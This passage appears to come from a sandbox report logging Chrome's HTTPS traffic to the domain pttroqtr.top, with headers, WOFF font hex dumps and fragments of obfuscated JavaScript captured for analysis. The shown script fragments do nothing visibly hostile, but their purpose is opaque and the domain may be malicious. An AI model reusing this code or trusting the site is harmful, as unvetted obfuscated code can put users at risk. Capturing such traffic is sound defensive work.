                                                                                                                                                                                            Data Ascii: ,'':a2_0x49024d(0x26a),'\u205f\u200a':a2_0x49024d(0x5cc)+'e;','\u2009':a2_0x49024d(0x5d5),'':a2_0x49024d(0x229),'':a2_0x49024d(0x5d7),'':'&cong;','':a2_0x49024d(0x33f),'':'&Topf;','':'&tdot;','':'&Tscr;','':'&Tstrok;','':'&Uac
                                                                                                                                                                                            2024-09-28 03:39:32 UTC16384INData Raw: 78 34 30 30 29 2c 27 3e e2 83 92 27 3a 61 32 5f 30 78 34 39 30 32 34 64 28 30 78 33 66 36 29 2c 27 e2 a7 9e 27 3a 61 32 5f 30 78 34 39 30 32 34 64 28 30 78 35 62 66 29 2c 27 e2 a4 82 27 3a 61 32 5f 30 78 34 39 30 32 34 64 28 30 78 33 32 37 29 2c 27 e2 89 a4 e2 83 92 27 3a 61 32 5f 30 78 34 39 30 32 34 64 28 30 78 36 64 38 29 2c 27 3c e2 83 92 27 3a 61 32 5f 30 78 34 39 30 32 34 64 28 30 78 35 62 39 29 2c 27 e2 8a b4 e2 83 92 27 3a 61 32 5f 30 78 34 39 30 32 34 64 28 30 78 36 66 38 29 2c 27 e2 a4 83 27 3a 61 32 5f 30 78 34 39 30 32 34 64 28 30 78 35 39 32 29 2c 27 e2 8a b5 e2 83 92 27 3a 61 32 5f 30 78 34 39 30 32 34 64 28 30 78 34 64 65 29 2c 27 e2 88 bc e2 83 92 27 3a 27 26 6e 76 73 69 6d 3b 27 2c 27 e2 87 96 27 3a 61 32 5f 30 78 34 39 30 32 34 64 28 30
                                                                                                                                                                                            Data Ascii: x400),'>':a2_0x49024d(0x3f6),'':a2_0x49024d(0x5bf),'':a2_0x49024d(0x327),'':a2_0x49024d(0x6d8),'<':a2_0x49024d(0x5b9),'':a2_0x49024d(0x6f8),'':a2_0x49024d(0x592),'':a2_0x49024d(0x4de),'':'&nvsim;','':a2_0x49024d(0
                                                                                                                                                                                            2024-09-28 03:39:32 UTC16384INData Raw: 27 26 66 72 61 63 32 33 3b 27 2c 27 26 74 68 69 6e 73 70 3b 27 2c 27 26 74 63 65 64 69 6c 3b 27 2c 27 26 73 69 6d 65 71 3b 27 2c 27 26 6f 6d 69 6e 75 73 3b 27 2c 27 69 61 6e 67 6c 65 42 61 72 3b 27 2c 27 26 62 65 70 73 69 3b 27 2c 27 26 76 63 79 3b 27 2c 27 26 61 6e 67 72 74 76 62 3b 27 2c 27 73 74 72 6f 6e 67 27 2c 27 26 64 74 72 69 66 3b 27 2c 27 26 6b 6f 70 66 3b 27 2c 27 63 74 6f 72 3b 27 2c 27 26 72 72 61 72 72 3b 27 2c 27 6f 77 6e 3b 27 2c 27 72 69 67 68 74 3b 27 2c 27 26 54 48 4f 52 4e 3b 27 2c 27 26 64 6f 75 62 6c 65 62 61 72 27 2c 27 69 6e 64 65 78 27 2c 27 26 69 6f 63 79 3b 27 2c 27 26 66 63 79 3b 27 2c 27 26 50 66 72 3b 27 2c 27 26 72 61 63 65 3b 27 2c 27 26 69 6d 61 67 70 61 72 74 3b 27 2c 27 26 6c 65 73 64 6f 74 6f 72 3b 27 2c 27 66 72 6f 6d
                                                                                                                                                                                            Data Ascii: '&frac23;','&thinsp;','&tcedil;','&simeq;','&ominus;','iangleBar;','&bepsi;','&vcy;','&angrtvb;','strong','&dtrif;','&kopf;','ctor;','&rrarr;','own;','right;','&THORN;','&doublebar','index','&iocy;','&fcy;','&Pfr;','&race;','&imagpart;','&lesdotor;','from
                                                                                                                                                                                            2024-09-28 03:39:32 UTC787INData Raw: 64 66 38 39 5b 27 61 63 74 69 6f 6e 73 27 5d 5b 5f 30 78 35 61 38 31 35 32 28 30 78 35 39 37 29 5d 3e 30 78 31 26 26 28 5f 30 78 34 32 64 66 38 39 5b 27 6c 6f 61 64 69 6e 67 27 5d 3d 21 30 78 30 29 3b 7d 29 2c 61 32 5f 30 78 31 39 61 31 31 33 28 28 29 3d 3e 5f 30 78 34 32 64 66 38 39 5b 27 6c 6f 61 64 69 6e 67 27 5d 2c 28 29 3d 3e 7b 76 61 72 20 5f 30 78 35 65 62 33 64 66 3d 5f 30 78 34 39 31 61 37 65 3b 63 6f 6e 73 74 20 5f 30 78 35 31 39 62 31 38 3d 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 35 65 62 33 64 66 28 30 78 33 32 36 29 2b 5f 30 78 35 65 62 33 64 66 28 30 78 32 32 32 29 5d 28 27 2e 67 2d 6c 6f 61 64 69 6e 67 27 2b 5f 30 78 35 65 62 33 64 66 28 30 78 34 38 37 29 29 3b 5f 30 78 34 32 64 66 38 39 5b 5f 30 78 35 65 62 33 64 66 28 30 78 34 35 33 29 5d 3f
                                                                                                                                                                                            Data Ascii: df89['actions'][_0x5a8152(0x597)]>0x1&&(_0x42df89['loading']=!0x0);}),a2_0x19a113(()=>_0x42df89['loading'],()=>{var _0x5eb3df=_0x491a7e;const _0x519b18=document[_0x5eb3df(0x326)+_0x5eb3df(0x222)]('.g-loading'+_0x5eb3df(0x487));_0x42df89[_0x5eb3df(0x453)]?


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            38192.168.2.5497578.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:31 UTC593OUTGET /help/assets/8560f9bdkFGym.woff HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            Origin: https://pttroqtr.top
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: font
                                                                                                                                                                                            Referer: https://pttroqtr.top/help/assets/2dd339f2kFGym.css
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:31 UTC311INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:31 GMT
                                                                                                                                                                                            Content-Type: font/woff
                                                                                                                                                                                            Content-Length: 62844
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                            Last-Modified: Wed, 29 May 2024 10:14:42 GMT
                                                                                                                                                                                            ETag: W/"f57c-18fc3d84650"
                                                                                                                                                                                            2024-09-28 03:39:31 UTC16073INData Raw: 77 4f 46 46 00 01 00 00 00 00 f5 7c 00 12 00 00 00 01 a3 c4 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 46 46 54 4d 00 00 01 94 00 00 00 1c 00 00 00 1c 5d d2 28 5a 47 44 45 46 00 00 01 b0 00 00 00 1e 00 00 00 20 03 de 00 03 47 50 4f 53 00 00 01 d0 00 00 00 20 00 00 00 20 6c 91 74 8f 47 53 55 42 00 00 01 f0 00 00 01 bf 00 00 02 8a 48 8f b8 db 4f 53 2f 32 00 00 03 b0 00 00 00 5e 00 00 00 60 a0 cd 9b 5d 63 6d 61 70 00 00 04 10 00 00 03 22 00 00 04 7e cd 2a 1c 8d 63 76 74 20 00 00 07 34 00 00 00 34 00 00 00 34 06 91 09 86 66 70 67 6d 00 00 07 68 00 00 01 b1 00 00 02 65 0f b4 2f a7 67 61 73 70 00 00 09 1c 00 00 00 08 00 00 00 08 00 00 00 10 67 6c 79 66 00 00 09 24 00 00 cc d5 00 01 5f 20 ee d2 69 30 68 65 61 64 00 00 d5 fc 00 00 00
                                                                                                                                                                                            Data Ascii: wOFF|FFTM](ZGDEF GPOS ltGSUBHOS/2^`]cmap"~*cvt 444fpgmhe/gaspglyf$_ i0head
                                                                                                                                                                                            2024-09-28 03:39:31 UTC16384INData Raw: 7f 8f 6b a7 fb ce fa 4f 3b 47 db cf ff 13 0e e3 38 da ff 17 9d ff 8e a2 fd a7 43 fb b7 71 ed 0b b4 cf 68 ff d7 80 cf da db da 81 ff 6e a6 ed ff 82 fe 5f d3 f1 7f d1 f9 ef 66 2a 27 cf c7 1a 45 a0 03 a5 03 df 1f a4 57 5e c9 16 69 62 3c f5 47 32 f9 33 03 50 21 43 66 16 32 bd ce 04 d6 1d 69 16 12 dc 9e 54 6a 35 cc cf c6 8a 12 3e 29 ae a2 84 af 84 2f 30 01 d9 2e 28 49 a2 84 1c 2b 4c 04 72 da c5 00 cd 8f fe 63 c6 43 97 89 15 47 b4 9f 7b fc 5a 33 a7 eb 86 c9 a7 7a bc f5 c0 fd 67 4e 1d 3f 37 f5 85 dd 4d cf bf bc f3 b9 66 f2 c1 17 44 e8 5f ce 13 e7 0b 0f 0e 5b df af 74 e4 65 43 57 56 2f be 57 9b f1 a5 76 5a 7b 8f 88 27 f7 1f fd ed a7 f5 8f bd c9 e0 48 63 a9 e8 b9 1a c9 ce d5 f9 18 7c c5 52 0a 97 2a b6 4f af 75 dc be 60 5a 87 ed a4 da 16 d7 4e c7 67 ed 57 7d 17 df
                                                                                                                                                                                            Data Ascii: kO;G8Cqhn_f*'EW^ib<G23P!Cf2iTj5>)/0.(I+LrcCG{Z3zgN?7MfD_[teCWV/WvZ{'Hc|R*Ou`ZNgW}
                                                                                                                                                                                            2024-09-28 03:39:32 UTC16384INData Raw: cd 1c 19 f9 5c ce 1c 39 9d 6e 34 b4 d0 db c8 8d d1 9a d9 e9 4c 27 72 a5 02 d0 09 b0 cb 9b 25 87 37 1d 95 42 e1 f5 59 a1 3c d0 6c 7f 02 78 15 6e 5f 80 1f 51 d6 32 8d 79 2b 97 af d4 5c de 1f 2e 28 28 13 05 2e ab 00 65 75 30 3d 29 14 7a d2 5d d3 08 a6 21 99 3b d9 cd c1 34 a6 27 07 be eb c3 af 32 0d 71 ee 64 d6 26 d3 13 a9 c9 ee 4c cb 44 75 d0 7f 43 65 48 04 52 4b 93 62 cc c9 03 b9 79 d5 60 7e 55 30 c1 15 36 5b 0b 50 1b d8 b2 c1 43 30 0f df 50 5c 21 93 45 0f 48 9c 4b ac a0 13 7e 77 2f 52 99 ad 5a e5 03 0d 86 3c da d7 78 21 1d 72 f3 a3 13 3a dd 3d 69 45 a7 65 8f 32 bd 98 35 77 78 fa 8a 89 8b d3 fa 96 53 89 7c 45 b6 90 c7 d8 9e 31 5f 2e 64 da 71 d0 d8 ff ee 95 b4 92 7c 71 4f 43 a4 40 3e 5c 3c a9 96 a6 93 37 c6 2e ea 14 29 60 3a 72 5c 4e 15 fe cf 68 c4 eb ce 97
                                                                                                                                                                                            Data Ascii: \9n4L'r%7BY<lxn_Q2y+\.((.eu0=)z]!;4'2qd&LDuCeHRKby`~U06[PC0P\!EHK~w/RZ<x!r:=iEe25wxS|E1_.dq|qOC@>\<7.)`:r\Nh
                                                                                                                                                                                            2024-09-28 03:39:32 UTC14003INData Raw: a9 b5 4e 8e 01 8f 86 ec 89 f0 31 60 f2 81 db 44 d0 ac ea 6a 37 53 bc 6d b3 0d 8e 20 66 58 d2 d0 30 96 b0 35 5d b0 90 6d 93 ba 3d 05 93 62 69 36 ad a4 0c 1a e6 9b 40 9e 61 06 0d 56 cd 30 29 c8 a5 84 27 b6 7a 68 e0 78 06 e4 58 81 60 5e c9 4e 76 d3 58 48 a0 cc 4c c1 69 92 d1 e1 4c 88 f8 7f 63 7f 01 66 e0 80 96 30 08 93 5f 6a 7b 0d df e8 b9 30 64 d4 95 f7 7f f7 87 72 ae e5 88 2b ff ab af 8a a6 8f f2 0e 9b f9 19 20 22 cb b7 f4 9c e4 da da 3a 4f 1c e9 39 3c da fd da f9 72 59 b7 a4 5c 5f 6a ec e1 e2 a8 5e e5 aa f0 34 e8 07 d0 79 ca 37 14 a2 97 29 9d 94 f4 7e 23 54 a8 ce a1 6c 40 1f 77 c1 7c 39 04 c5 be 06 73 84 b0 2b 86 d1 04 d0 74 b2 37 a4 16 69 81 cd 17 54 ab 59 9a 68 37 61 fc 3f 08 64 7b 83 49 16 b2 ce 52 08 89 24 71 74 26 92 c1 ab 86 ce 04 07 66 42 91 a6 48
                                                                                                                                                                                            Data Ascii: N1`Dj7Sm fX05]m=bi6@aV0)'zhxX`^NvXHLiLcf0_j{0dr+ ":O9<rY\_j^4y7)~#Tl@w|9s+t7iTYh7a?d{IR$qt&fBH


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            39192.168.2.5497628.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:31 UTC593OUTGET /help/assets/f18e42bakFGym.woff HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            Origin: https://pttroqtr.top
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: font
                                                                                                                                                                                            Referer: https://pttroqtr.top/help/assets/2dd339f2kFGym.css
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:31 UTC313INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:31 GMT
                                                                                                                                                                                            Content-Type: font/woff
                                                                                                                                                                                            Content-Length: 333588
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                            Last-Modified: Wed, 29 May 2024 10:14:42 GMT
                                                                                                                                                                                            ETag: W/"51714-18fc3d84650"
                                                                                                                                                                                            2024-09-28 03:39:31 UTC16071INData Raw: 77 4f 46 46 00 01 00 00 00 05 17 14 00 0b 00 00 00 05 16 c8 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4f 53 2f 32 00 00 01 08 00 00 00 60 00 00 00 60 0f 12 08 eb 63 6d 61 70 00 00 01 68 00 00 00 4c 00 00 00 4c 1a 55 d2 18 67 61 73 70 00 00 01 b4 00 00 00 08 00 00 00 08 00 00 00 10 67 6c 79 66 00 00 01 bc 00 04 e5 4c 00 04 e5 4c 7b 68 e8 26 68 65 61 64 00 04 e7 08 00 00 00 36 00 00 00 36 0a e0 a9 c8 68 68 65 61 00 04 e7 40 00 00 00 24 00 00 00 24 0d c4 0e 50 68 6d 74 78 00 04 e7 64 00 00 17 18 00 00 17 18 2b e5 61 90 6c 6f 63 61 00 04 fe 7c 00 00 17 1c 00 00 17 1c 0d b5 9f f4 6d 61 78 70 00 05 15 98 00 00 00 20 00 00 00 20 06 00 05 b6 6e 61 6d 65 00 05 15 b8 00 00 01 3c 00 00 01 3c ec ff 90 85 70 6f 73 74 00 05 16 f4 00 00 00
                                                                                                                                                                                            Data Ascii: wOFFOS/2``cmaphLLUgaspglyfLL{h&head66hhea@$$Phmtxd+aloca|maxp name<<post
                                                                                                                                                                                            2024-09-28 03:39:31 UTC16384INData Raw: 67 9a 9a e1 fd 0a 15 0a 0a 15 02 f6 15 0a 0a 15 01 9a 01 99 fe 67 9a 9a cd 1e 15 16 1e 1e 16 15 1e 00 03 00 33 00 33 03 cd 03 66 00 07 00 0f 00 1e 00 00 01 27 15 23 15 33 15 37 05 35 33 35 23 35 07 17 01 32 36 35 11 34 26 23 22 06 15 11 14 16 33 01 9a 9a cd cd 9a 01 66 cd cd 9a 9a ff 00 15 1e 1e 15 15 1e 1e 15 01 cd 99 66 66 67 9a 9a 67 66 66 99 9a ff 00 0a 15 02 f6 15 09 09 15 fd 0a 15 0a 00 00 00 02 00 9a 00 33 03 66 03 66 00 07 00 16 00 00 01 17 35 21 35 21 35 07 03 22 06 15 11 14 16 33 32 36 35 11 34 26 23 01 33 9a 01 99 fe 67 9a 66 15 1e 1e 15 15 1e 1e 15 01 cd 9a 67 66 66 99 01 99 09 15 fd 0a 15 0a 0a 15 02 f6 15 09 00 00 00 00 02 00 9a 00 33 03 66 03 66 00 07 00 16 00 00 01 15 21 15 21 15 37 27 37 11 14 16 33 32 36 35 11 34 26 23 22 06 15 02 33 fe
                                                                                                                                                                                            Data Ascii: gg33f'#37535#52654&#"3fffggff3ff5!5!5"32654&#3gfgff3ff!!7'732654&#"3
                                                                                                                                                                                            2024-09-28 03:39:32 UTC16384INData Raw: 04 03 05 1c 11 2e 20 30 0b 13 18 2c 2c de 2c 3f 02 01 3c 2c 2d 3f 01 02 3c 2d 03 5a 20 20 17 16 11 2f 1e 1d 47 2a 18 2f 16 17 16 12 12 12 29 16 13 24 10 09 11 08 47 24 14 3f 2c 03 0a 0b 03 10 14 09 12 1e 0d 20 19 28 10 1a 40 26 3e 5e 1f fd 77 01 38 2f 30 3a 01 01 36 30 2f 3b 02 00 01 00 41 00 33 03 bf 03 6b 00 1d 00 00 01 23 11 14 06 2b 01 11 23 11 23 22 26 35 11 23 22 36 37 01 3e 01 33 32 16 17 01 1e 01 23 03 bc 56 14 1f cd cc cd 1f 14 56 17 04 10 01 9b 07 13 0a 0a 13 07 01 9b 10 04 17 01 9a fe cc 11 22 01 33 fe cd 22 11 01 34 16 10 01 9b 08 08 08 08 fe 65 10 16 00 00 00 00 03 00 e1 ff cd 03 1f 03 cd 00 3c 00 5b 00 93 00 00 01 3c 01 31 34 26 27 2e 01 23 22 06 07 0e 01 15 30 14 15 14 16 17 1e 01 15 14 06 07 0e 01 15 1c 01 31 14 16 17 1e 01 33 32 36 37 3e
                                                                                                                                                                                            Data Ascii: . 0,,,?<,-?<-Z /G*/)$G$?, (@&>^w8/0:60/;A3k#+##"&5#"67>32#VV"3"4e<[<14&'.#"013267>
                                                                                                                                                                                            2024-09-28 03:39:32 UTC16384INData Raw: 66 ff cd 03 9a 03 cd 00 07 00 20 00 00 01 33 11 33 27 07 33 11 01 23 15 33 11 21 11 33 35 23 22 06 15 11 14 16 33 21 32 36 35 11 34 26 23 01 cd 66 67 9a 9a 67 01 99 99 66 fd 9a 66 99 16 1e 1e 16 02 cc 16 1e 1e 16 01 33 01 cd cd cd fe 33 01 33 66 fe 33 01 cd 66 1e 15 fd cd 15 1e 1e 15 02 33 15 1e 00 00 00 01 00 80 00 24 03 80 03 76 00 34 00 00 01 22 06 07 25 3e 01 35 34 26 27 25 1e 01 33 32 36 35 34 26 23 22 06 15 14 16 17 05 2e 01 23 22 06 15 14 16 33 32 36 37 05 0e 01 15 14 16 33 32 36 35 34 26 23 03 00 18 2b 11 fe d0 02 02 02 02 01 2d 11 2d 19 35 4b 4b 35 35 4b 02 02 fe d3 11 2d 19 35 4b 4b 35 19 2d 11 01 30 02 01 48 34 34 48 48 34 01 1d 12 0f b1 07 0f 08 08 0f 07 af 10 12 4b 35 35 4b 4b 35 08 0f 07 b0 10 13 4b 35 35 4b 12 10 b1 07 0e 07 33 49 49 33 34
                                                                                                                                                                                            Data Ascii: f 33'3#3!35#"3!2654&#fggff333f3f3$v4"%>54&'%32654&#".#"326732654&#+--5KK55K-5KK5-0H44HH4K55KK5K55K3II34
                                                                                                                                                                                            2024-09-28 03:39:32 UTC16384INData Raw: 19 3b 20 3f 43 42 41 81 21 2b 02 62 4b 35 35 4b 4b 35 35 4b 3b 32 2d 08 08 04 01 02 1b 1e fe cd 60 42 20 1f bf a1 13 2d 17 18 2d 13 17 23 12 c5 4b 35 35 4b 4b 35 35 4b fe d1 01 04 08 08 2d 32 12 23 17 13 2d 18 17 2d 13 a1 bf 1f 20 42 60 01 33 1e 1b 02 00 00 02 00 21 ff ed 03 df 03 ac 00 22 00 45 00 00 25 22 26 27 2e 01 31 07 1e 01 17 07 06 26 27 03 26 36 3f 01 0e 01 17 1e 01 17 1e 01 17 1e 01 15 14 06 23 25 03 2e 01 0f 01 1e 01 17 07 30 26 27 2e 01 27 26 06 07 06 16 17 1e 01 17 1e 01 07 0e 01 07 37 3e 01 27 02 01 30 50 1d 1d 20 4c 28 4c 17 51 1d 32 07 9e 07 1f 1c bf 23 1d 04 02 29 20 21 56 30 5a 4c 3f 30 01 de 9e 07 32 1d 88 1a 61 38 3b 14 15 16 45 32 2f 41 02 02 4a 5c 46 5f 1d 1d 17 01 01 1b 11 8c 1c 1f 07 98 19 0f 0f 19 ad 15 1d 08 14 06 1f 1c 02 96 1d
                                                                                                                                                                                            Data Ascii: ; ?CBA!+bK55KK55K;2-`B --#K55KK55K-2#-- B`3!"E%"&'.1&'&6?#%.0&'.'&7>'0P L(LQ2#) !V0ZL?02a8;E2/AJ\F_
                                                                                                                                                                                            2024-09-28 03:39:32 UTC16384INData Raw: 26 27 2e 01 23 13 0e 01 23 22 26 27 2e 01 35 34 36 37 3e 01 33 32 16 17 1e 01 15 14 06 07 02 18 06 0d 07 07 0d 06 05 09 03 04 05 04 04 03 0a 05 06 0d 07 07 0d 06 05 09 03 04 04 03 04 04 09 05 18 56 98 38 39 41 41 39 38 98 56 56 98 38 39 41 41 39 38 98 56 5b 10 2f 1e 1e 31 12 13 12 14 15 10 2f 1e 1e 2f 11 14 14 14 15 02 51 04 05 05 04 05 10 0c 0f 34 24 25 31 0e 0e 12 04 05 04 04 05 05 10 0c 0f 33 25 24 32 0d 0e 12 05 01 0f 41 39 38 98 56 56 98 38 39 41 41 39 38 98 56 56 98 38 39 41 fd c1 16 15 17 18 17 52 3c 3a 54 19 15 15 15 15 1a 54 3a 3b 54 19 00 00 04 00 60 00 20 03 a0 03 60 00 18 00 31 00 67 00 9d 00 00 01 22 06 07 0e 01 15 14 16 17 1e 01 33 32 36 37 3e 01 35 34 26 27 2e 01 23 11 22 26 27 2e 01 35 34 36 37 3e 01 33 32 16 17 1e 01 15 14 06 07 0e 01 23
                                                                                                                                                                                            Data Ascii: &'.##"&'.5467>32V89AA98VV89AA98V[/1//Q4$%13%$2A98VV89AA98VV89AR<:TT:;T` `1g"3267>54&'.#"&'.5467>32#
                                                                                                                                                                                            2024-09-28 03:39:32 UTC16384INData Raw: 36 61 24 24 29 29 24 24 61 36 37 61 24 23 2a 01 58 5f 0d 13 13 0d 0d 13 3f 0d 13 13 0d fe 3c 1c 20 1e 19 1a 45 27 30 52 19 32 59 25 24 38 10 01 e7 2e 50 1f 20 2d 0b 25 2d 1e 1a 1a 44 28 28 47 1a 01 3f 76 03 38 2d 2e 79 45 3a 67 2b 88 26 75 25 2b 2a 25 78 26 8b 2b 68 3a 44 79 2d 2e 38 03 77 05 18 10 13 1c 1c 13 10 18 05 fe 36 37 60 24 24 2a 2a 24 24 60 37 37 60 24 24 2a 2a 24 24 60 37 39 12 0d 7f 0d 13 13 0d 5f 13 0d 0d 12 c4 1a 47 28 28 44 1a 1a 1e 2d 25 0b 2d 20 1f 50 2e 00 00 00 1c 00 00 00 a1 04 e1 02 df 00 18 00 29 00 3a 00 3f 00 46 00 4c 00 52 00 59 00 5f 00 66 00 6b 00 71 00 77 00 7c 00 82 00 88 00 8e 00 93 00 99 00 9e 00 a3 00 a8 00 ad 00 b3 00 b8 00 bd 00 c3 00 c9 00 00 01 23 35 34 26 23 21 22 06 15 11 14 16 3b 01 15 21 27 33 32 36 3d 01 33 27 03
                                                                                                                                                                                            Data Ascii: 6a$$))$$a67a$#*X_?< E'0R2Y%$8.P -%-D((G?v8-.yE:g+&u%+*%x&+h:Dy-.8w67`$$**$$`77`$$**$$`79_G((D-%- P.):?FLRY_fkqw|#54&#!";!'326=3'
                                                                                                                                                                                            2024-09-28 03:39:32 UTC16384INData Raw: 75 2b 2c 32 32 2c 2b 75 43 42 75 2c 2b 33 22 1e 64 12 2b 10 b5 13 13 16 13 35 13 01 07 26 20 21 58 32 31 58 21 20 26 26 20 21 58 31 32 58 21 20 26 00 04 00 61 00 81 03 7f 02 ff 00 0c 00 13 00 1a 00 1f 00 00 01 35 21 11 23 17 23 15 21 11 33 35 17 25 21 15 25 03 33 11 07 21 15 21 11 33 11 05 11 21 11 21 01 1f 02 60 60 02 63 fd a3 5f 5f 02 3f fd e0 01 e3 02 3f 5e fd de 01 e0 42 fd 7f 02 20 fd e0 02 9e 61 fe 42 61 5f 01 bf 61 03 42 42 02 fe bf 01 81 61 3f fe c1 01 7e 5e fe 7f 01 81 00 03 00 60 00 80 03 80 03 00 00 04 00 0b 00 12 00 00 37 21 11 21 11 13 21 11 33 11 21 07 37 07 21 11 33 11 21 60 02 60 fd a0 5e 02 22 40 fd a0 02 62 02 02 22 40 fd a0 80 01 c0 fe 40 01 e0 fe 80 01 c0 40 a0 40 fe 80 01 c0 00 00 00 03 00 6d 00 14 03 93 03 6c 00 04 00 0b 00 12 00 00
                                                                                                                                                                                            Data Ascii: u+,22,+uCBu,+3"d+5& !X21X! && !X12X! &a5!##!35%!%3!!3!!``c__??^B aBa_aBBa?~^`7!!!3!7!3!``^"@b"@@@@ml
                                                                                                                                                                                            2024-09-28 03:39:32 UTC16384INData Raw: 36 0d 0f 0a fe ec 02 8b fe e0 01 20 fe e0 01 20 fe e0 01 20 fe e0 01 20 02 a0 5e 02 60 60 02 60 02 26 1a fe 40 1a 26 26 1a 01 c0 1a 26 40 80 80 da 36 26 26 36 36 26 26 36 da 80 80 fe 02 3f 09 09 0a 22 22 0a 09 0a 3e 1e 20 20 40 20 20 40 20 20 40 20 20 00 00 09 00 40 00 1f 03 c0 03 41 00 1b 00 28 00 3d 00 4a 00 5e 00 63 00 68 00 6d 00 72 00 00 01 34 26 2b 01 30 36 35 34 26 23 22 06 15 1c 01 31 23 22 06 15 1c 01 31 21 30 34 35 27 22 26 35 34 36 33 32 16 15 14 06 23 05 27 17 21 35 27 22 06 15 11 14 16 33 21 32 36 35 11 34 26 23 05 32 16 15 14 06 23 22 26 35 34 36 33 03 30 36 37 3e 01 31 30 16 33 32 36 31 30 16 17 1e 01 31 21 25 21 35 21 15 35 21 35 21 15 35 21 35 21 15 35 21 35 21 15 02 e0 13 0d 60 01 39 28 28 38 60 0d 13 01 c0 e0 0d 13 13 0d 0d 13 13 0d 01
                                                                                                                                                                                            Data Ascii: 6 ^```&@&&&@6&&66&&6?""> @ @ @ @A(=J^chmr4&+0654&#"1#"1!045'"&54632#'!5'"3!2654&#2#"&5463067>10326101!%!5!5!5!5!5!5!5!`9((8`
                                                                                                                                                                                            2024-09-28 03:39:32 UTC16384INData Raw: 26 2b 01 35 33 32 36 35 34 26 2b 01 35 33 32 36 35 34 26 2b 01 35 33 32 36 35 34 26 2b 01 35 33 32 36 35 34 26 2b 01 35 33 32 36 35 34 26 2b 01 35 3a 01 33 32 36 35 3c 01 35 21 1c 01 15 14 16 33 3a 01 33 15 23 22 06 15 14 16 3b 01 15 23 22 06 15 14 16 3b 01 15 23 22 06 15 14 16 3b 01 15 23 22 06 15 14 16 3b 01 15 23 22 06 15 14 16 3b 01 15 23 22 06 15 14 16 3b 01 15 23 22 06 15 14 16 33 03 34 26 23 21 22 06 15 11 14 16 33 21 32 36 35 11 03 21 22 26 35 11 34 36 33 21 32 16 15 11 14 06 23 01 23 15 33 15 33 35 33 35 33 23 15 33 35 17 3e 01 37 3e 01 33 32 16 17 1e 01 17 37 2e 01 27 2e 01 23 22 06 07 0e 01 07 0e 01 15 14 16 17 1e 01 17 1e 01 33 32 36 37 3e 01 37 27 0e 01 07 0e 01 23 22 26 27 2e 01 27 2e 01 35 34 36 37 25 23 07 35 23 15 33 35 37 17 33 27 37 17
                                                                                                                                                                                            Data Ascii: &+532654&+532654&+532654&+532654&+532654&+5:3265<5!3:3#";#";#";#";#";#";#"34&#!"3!265!"&5463!2##335353#35>7>327.'.#"3267>7'#"&'.'.5467%#5#3573'7


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            40192.168.2.5497618.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:31 UTC593OUTGET /help/assets/2e158738kFGym.woff HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            Origin: https://pttroqtr.top
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
